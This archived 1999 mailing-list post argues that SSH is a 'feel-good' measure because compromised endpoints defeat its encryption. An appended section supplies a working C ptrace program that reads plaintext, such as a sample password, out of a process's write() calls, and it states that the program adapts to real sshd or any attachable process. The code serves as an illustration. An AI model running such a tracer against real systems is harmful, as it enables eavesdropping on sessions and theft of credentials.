Interesting People mailing list archives

IP: SSH: an ineffectual "feel-good" security measure -- from risks


From: Dave Farber <farber () cis upenn edu>
Date: Sat, 15 Jan 2000 19:04:32 -0500



Date: Mon, 20 Dec 1999 00:34:14 -0700
From: "Schlake ( William Colburn )" <schlake () nmt edu>


When I first read the report of RST breaking the Netscape algorithm I was
caught up in the moment. Netscape should have known better than to do
something so foolish! Then I read the next comp.risks and I felt like a
fool. There is a great risk in pretending to have security when you really
have none.

I think many people believe that ssh protects them from wrong-doers, and
that nothing bad can happen to them if they use ssh. The authors of the
Internet Auditing Project (1) have a good story to tell about ssh, as do the
people who run the web site for rootshell.org (2). Some sys-admins here at
work are rabid about ssh. They have disabled telnet and rlogin for
"security" reasons, and naively believe that ssh is somehow more secure.

Ssh protects the data stream between two secure machines. Anyone sitting
between the two machines can't tell what is going on in the ssh stream
because of the encryption. The risk to the user is assuming that either end
is secure.

Where I work, the important servers don't run telnet or rlogin, because
those protocols are "insecure". The servers only run ssh. Our network is
switched. In order to sniff packets an attacker either needs to be in the
machine room with a cable plugged into the switch, or they need to be on
either of the two machines that the traffic is going between AND they need
to be root. If they are root on either machine, then they can:

  a) read the unencrypted TTY instead of the encrypted stream
  b) read the local secret keys and decode the stream on the fly
  c) replace ssh with a Trojan
  d) trace the program and extract the unencrypted data from the write()s
  e) many more things I can't think of right now

If no one has compromised my system, then it is safe to use telnet to login
between machines. If someone has compromised my system however, I might as
well use telnet since I can't trust ssh anymore. If no one has compromised
my system, and I need to login over an untrusted network, and I have a
secure machine to login from, then ssh is the perfect tool.

Where am I going to find a secure machine outside my network? I bet there
are lots of secure machines all over the place, but I will never know which
ones they are. If security is really important to me, I will never log in
to any computer from any other computer I don't own (and hence trust)
myself. That means that if I need to login to work when I am off site,
I need to have my own laptop that I keep powered down, encased in
cement, buried in a vault, and guarded by an army (and even then can I
really be sure it is secure)?

Last week I spent an entire day at work wondering how to protect my mail
server from all the trouble that is expected from people trying to hide
under the veil of Y2K. I took ssh out of the inetd.conf, and told everyone
that they have to log in on console from now on.

(1): http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id=32
(2): http://www.rootshell.org/mailinglist-archive/rs-25
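Item (d) in the list above, tracing the endpoint process and pulling the plaintext out of its write() calls, is the point most worth seeing in working code, because it needs no key material at all. The following is an added example written for this archive page; it is not code from the original post, from comp.risks, or from either cited project. It assumes Linux on x86_64 or aarch64 and that tracing one's own child is permitted (Yama ptrace_scope 0 or 1). A forked child that calls write(2) stands in for sshd handing decrypted session data to the tty, and the "login: ... password: ..." line is a constructed sample, not real credentials.

```c
#define _GNU_SOURCE
#include <elf.h>          /* NT_PRSTATUS */
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>

/* Register layout differs per architecture; only these two are covered. */
#if defined(__x86_64__)
#include <sys/user.h>
typedef struct user_regs_struct regs_t;
#define SYSCALL_NR(r)   ((r).orig_rax)
#define SYSCALL_ARG0(r) ((r).rdi)
#define SYSCALL_ARG1(r) ((r).rsi)
#define SYSCALL_ARG2(r) ((r).rdx)
#elif defined(__aarch64__)
#include <asm/ptrace.h>
typedef struct user_pt_regs regs_t;
#define SYSCALL_NR(r)   ((r).regs[8])
#define SYSCALL_ARG0(r) ((r).regs[0])
#define SYSCALL_ARG1(r) ((r).regs[1])
#define SYSCALL_ARG2(r) ((r).regs[2])
#else
#error "this example covers x86_64 and aarch64 Linux only"
#endif

/* Copy up to len bytes out of the tracee's address space, one word at a time. */
static size_t peek_buffer(pid_t pid, unsigned long addr, size_t len,
                          char *out, size_t cap)
{
    size_t copied = 0;
    if (len > cap)
        len = cap;
    while (copied < len) {
        errno = 0;
        long word = ptrace(PTRACE_PEEKDATA, pid, (void *)(addr + copied), NULL);
        if (word == -1 && errno != 0)
            break;
        size_t chunk = sizeof word;
        if (chunk > len - copied)
            chunk = len - copied;
        memcpy(out + copied, &word, chunk);
        copied += chunk;
    }
    return copied;
}

/* Fork a stand-in for the SSH endpoint process (assumption: a plain child that
 * write()s `plaintext` to stdout plays the role of sshd after decryption). The
 * parent, playing the root attacker of item (d), traces the child and copies
 * every buffer passed to write(2) on stdout into `out`. Returns bytes captured. */
size_t snoop_child_writes(const char *plaintext, char *out, size_t cap)
{
    if (cap == 0)
        return 0;
    fflush(NULL);                       /* don't duplicate stdio buffers in the child */
    pid_t pid = fork();
    if (pid < 0)
        return 0;
    if (pid == 0) {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(111);
        raise(SIGSTOP);                 /* pause until the tracer has set options */
        (void)write(STDOUT_FILENO, plaintext, strlen(plaintext));
        _exit(0);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status))
        return 0;
    /* Syscall stops get SIGTRAP|0x80 so they can't be confused with a real SIGTRAP. */
    ptrace(PTRACE_SETOPTIONS, pid, NULL, (void *)(uintptr_t)PTRACE_O_TRACESYSGOOD);

    size_t n = 0;
    int at_entry = 0;                   /* syscall stops alternate entry, exit */
    for (;;) {
        if (ptrace(PTRACE_SYSCALL, pid, NULL, NULL) == -1)
            break;
        if (waitpid(pid, &status, 0) < 0 || WIFEXITED(status) || WIFSIGNALED(status))
            break;
        if (!WIFSTOPPED(status) || WSTOPSIG(status) != (SIGTRAP | 0x80))
            continue;                   /* some other signal stop; just resume */
        at_entry = !at_entry;
        if (!at_entry)
            continue;                   /* arguments are read at entry only */
        regs_t regs;
        struct iovec iov = { .iov_base = &regs, .iov_len = sizeof regs };
        if (ptrace(PTRACE_GETREGSET, pid, (void *)(uintptr_t)NT_PRSTATUS, &iov) == -1)
            continue;
        if (SYSCALL_NR(regs) != SYS_write || SYSCALL_ARG0(regs) != STDOUT_FILENO)
            continue;
        /* The buffer is the decrypted data, read straight out of the process. */
        n += peek_buffer(pid, SYSCALL_ARG1(regs), SYSCALL_ARG2(regs),
                         out + n, cap - 1 - n);
    }
    out[n] = '\0';
    return n;
}

int main(void)
{
    char captured[256];
    /* Constructed sample session line; not real credentials. */
    size_t n = snoop_child_writes("login: alice  password: hunter2\n",
                                  captured, sizeof captured);
    fprintf(stderr, "tracer captured %zu bytes: %s", n, captured);
    return n == 0;
}
```

Nothing in the tracer touches the cipher or the host key; it reads the bytes at the one place they must be plaintext, which is the author's point that the endpoint, not the wire, is the risk. The same loop works unchanged for a real sshd child or, with PTRACE_ATTACH instead of PTRACE_TRACEME, for any already-running process the tracer is allowed to attach to.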